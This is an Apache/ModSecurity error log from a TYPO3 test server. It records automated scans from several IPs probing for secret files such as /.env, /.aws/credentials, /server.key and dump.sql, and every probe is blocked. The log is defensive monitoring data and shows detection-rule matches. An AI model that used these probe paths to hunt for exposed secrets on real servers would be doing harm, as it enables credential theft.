[Sat Nov 23 02:24:19.291795 2024] [authz_core:error] [pid 3497072] [client 213.152.176.252:40753] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.yml
[Sat Nov 23 02:24:19.306110 2024] [authz_core:error] [pid 3497103] [client 213.152.176.252:11585] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/dump.sql
[Sat Nov 23 02:24:19.307030 2024] [:error] [pid 3497107] [client 213.152.176.252:56535] [client 213.152.176.252] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z0Euw2EdcFKcrd_qegGIYgAAAAg"]
[Sat Nov 23 02:24:19.307270 2024] [:error] [pid 3497107] [client 213.152.176.252:56535] [client 213.152.176.252] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z0Euw2EdcFKcrd_qegGIYgAAAAg"]
[Sat Nov 23 02:24:19.307487 2024] [:error] [pid 3497107] [client 213.152.176.252:56535] [client 213.152.176.252] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z0Euw2EdcFKcrd_qegGIYgAAAAg"]
[Sat Nov 23 02:24:19.318551 2024] [:error] [pid 3497108] [client 213.152.176.252:5791] [client 213.152.176.252] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/server.key"] [unique_id "Z0Euw75BMr22K7-Pm50AqwAAAAk"]
[Sat Nov 23 02:24:19.319033 2024] [:error] [pid 3497108] [client 213.152.176.252:5791] [client 213.152.176.252] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/server.key"] [unique_id "Z0Euw75BMr22K7-Pm50AqwAAAAk"]
[Sat Nov 23 02:24:19.319242 2024] [:error] [pid 3497108] [client 213.152.176.252:5791] [client 213.152.176.252] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/server.key"] [unique_id "Z0Euw75BMr22K7-Pm50AqwAAAAk"]
[Sat Nov 23 02:24:19.345387 2024] [authz_core:error] [pid 3497075] [client 213.152.176.252:29721] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/user_secrets.yml
[Sat Nov 23 02:24:19.353086 2024] [authz_core:error] [pid 3497073] [client 213.152.176.252:64769] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/server-status
[Sat Nov 23 19:53:28.300076 2024] [:error] [pid 3498533] [client 45.148.10.172:35152] [client 45.148.10.172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z0IkqDci-q15mQdAjwNMuQAAAAk"]
[Sat Nov 23 19:53:28.300616 2024] [:error] [pid 3498533] [client 45.148.10.172:35152] [client 45.148.10.172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z0IkqDci-q15mQdAjwNMuQAAAAk"]
[Sat Nov 23 19:53:28.301064 2024] [:error] [pid 3498533] [client 45.148.10.172:35152] [client 45.148.10.172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z0IkqDci-q15mQdAjwNMuQAAAAk"]
[Sat Nov 23 22:19:19.365981 2024] [:error] [pid 3498533] [client 45.148.10.172:57878] [client 45.148.10.172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z0JG1zci-q15mQdAjwNMwQAAAAk"]
[Sat Nov 23 22:19:19.366767 2024] [:error] [pid 3498533] [client 45.148.10.172:57878] [client 45.148.10.172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z0JG1zci-q15mQdAjwNMwQAAAAk"]
[Sat Nov 23 22:19:19.367192 2024] [:error] [pid 3498533] [client 45.148.10.172:57878] [client 45.148.10.172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z0JG1zci-q15mQdAjwNMwQAAAAk"]
[Sun Nov 24 19:00:48.132326 2024] [:error] [pid 3523586] [client 206.166.251.8:35232] [client 206.166.251.8] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z0Np0BMfr5jqCMx820PkugAAAAc"]
[Sun Nov 24 19:00:48.132927 2024] [:error] [pid 3523586] [client 206.166.251.8:35232] [client 206.166.251.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z0Np0BMfr5jqCMx820PkugAAAAc"]
[Sun Nov 24 19:00:48.133326 2024] [:error] [pid 3523586] [client 206.166.251.8:35232] [client 206.166.251.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z0Np0BMfr5jqCMx820PkugAAAAc"]
[Mon Nov 25 05:20:18.292353 2024] [authz_core:error] [pid 3541668] [client 192.42.116.185:23752] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git, referer: http://surf.test.indacotrentino.com/.git/config
[Wed Nov 27 23:07:36.794842 2024] [:error] [pid 3586433] [client 103.150.186.126:48218] [client 103.150.186.126] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z0eYKJ5S4me_LSG8VZ-y_wAAAAU"]
[Wed Nov 27 23:07:36.798408 2024] [:error] [pid 3586433] [client 103.150.186.126:48218] [client 103.150.186.126] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z0eYKJ5S4me_LSG8VZ-y_wAAAAU"]
[Wed Nov 27 23:07:36.798877 2024] [:error] [pid 3586433] [client 103.150.186.126:48218] [client 103.150.186.126] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z0eYKJ5S4me_LSG8VZ-y_wAAAAU"]
[Fri Nov 29 01:47:32.343076 2024] [:error] [pid 3628410] [client 45.148.10.172:51374] [client 45.148.10.172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z0kPJHm8KQSPFke33BTP2AAAAAE"]
[Fri Nov 29 01:47:32.343912 2024] [:error] [pid 3628410] [client 45.148.10.172:51374] [client 45.148.10.172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z0kPJHm8KQSPFke33BTP2AAAAAE"]
[Fri Nov 29 01:47:32.344591 2024] [:error] [pid 3628410] [client 45.148.10.172:51374] [client 45.148.10.172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z0kPJHm8KQSPFke33BTP2AAAAAE"]
[Fri Nov 29 12:29:38.987417 2024] [:error] [pid 3630840] [client 179.43.149.114:41526] [client 179.43.149.114] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z0mlopwOy10ETjgAeBjs7QAAAAU"]
[Fri Nov 29 12:29:38.990479 2024] [:error] [pid 3630840] [client 179.43.149.114:41526] [client 179.43.149.114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z0mlopwOy10ETjgAeBjs7QAAAAU"]
[Fri Nov 29 12:29:38.990970 2024] [:error] [pid 3630840] [client 179.43.149.114:41526] [client 179.43.149.114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z0mlopwOy10ETjgAeBjs7QAAAAU"]
[Fri Nov 29 12:29:39.079411 2024] [:error] [pid 3638012] [client 179.43.149.114:41532] [client 179.43.149.114] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.exemple"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.exemple"] [unique_id "Z0mlo3HG9sX9DTF7v_BuYAAAAAY"]
[Fri Nov 29 12:29:39.079642 2024] [:error] [pid 3638012] [client 179.43.149.114:41532] [client 179.43.149.114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.exemple"] [unique_id "Z0mlo3HG9sX9DTF7v_BuYAAAAAY"]
[Fri Nov 29 12:29:39.079916 2024] [:error] [pid 3638012] [client 179.43.149.114:41532] [client 179.43.149.114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.exemple"] [unique_id "Z0mlo3HG9sX9DTF7v_BuYAAAAAY"]
[Fri Nov 29 12:30:00.052423 2024] [:error] [pid 3630801] [client 179.43.149.114:55928] [client 179.43.149.114] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z0mluPqMFqIbmw6FNbT7GgAAAAM"]
[Fri Nov 29 12:30:00.052761 2024] [:error] [pid 3630801] [client 179.43.149.114:55928] [client 179.43.149.114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z0mluPqMFqIbmw6FNbT7GgAAAAM"]
[Fri Nov 29 12:30:00.053021 2024] [:error] [pid 3630801] [client 179.43.149.114:55928] [client 179.43.149.114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z0mluPqMFqIbmw6FNbT7GgAAAAM"]
[Sat Nov 30 00:48:57.251371 2024] [:error] [pid 3651402] [client 45.148.10.172:41058] [client 45.148.10.172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z0pS6dFxOunvke4sRmJaxQAAAAI"]
[Sat Nov 30 00:48:57.252296 2024] [:error] [pid 3651402] [client 45.148.10.172:41058] [client 45.148.10.172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z0pS6dFxOunvke4sRmJaxQAAAAI"]
[Sat Nov 30 00:48:57.252848 2024] [:error] [pid 3651402] [client 45.148.10.172:41058] [client 45.148.10.172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z0pS6dFxOunvke4sRmJaxQAAAAI"]
[Sun Dec 01 06:46:28.496509 2024] [:error] [pid 3676083] [client 52.59.243.66:38518] [client 52.59.243.66] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z0v4NOwhA-QSPvXi4dw2nwAAAAk"]
[Sun Dec 01 06:46:28.498744 2024] [:error] [pid 3676083] [client 52.59.243.66:38518] [client 52.59.243.66] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z0v4NOwhA-QSPvXi4dw2nwAAAAk"]
[Sun Dec 01 06:46:28.499202 2024] [:error] [pid 3676083] [client 52.59.243.66:38518] [client 52.59.243.66] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z0v4NOwhA-QSPvXi4dw2nwAAAAk"]
[Mon Dec 02 01:40:20.027367 2024] [:error] [pid 3693210] [client 54.173.245.48:37598] [client 54.173.245.48] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z00B9PPd7lDySwF9p_vCiAAAAAE"]
[Mon Dec 02 01:40:20.027687 2024] [:error] [pid 3693210] [client 54.173.245.48:37598] [client 54.173.245.48] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z00B9PPd7lDySwF9p_vCiAAAAAE"]
[Mon Dec 02 01:40:20.027932 2024] [:error] [pid 3693210] [client 54.173.245.48:37598] [client 54.173.245.48] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z00B9PPd7lDySwF9p_vCiAAAAAE"]
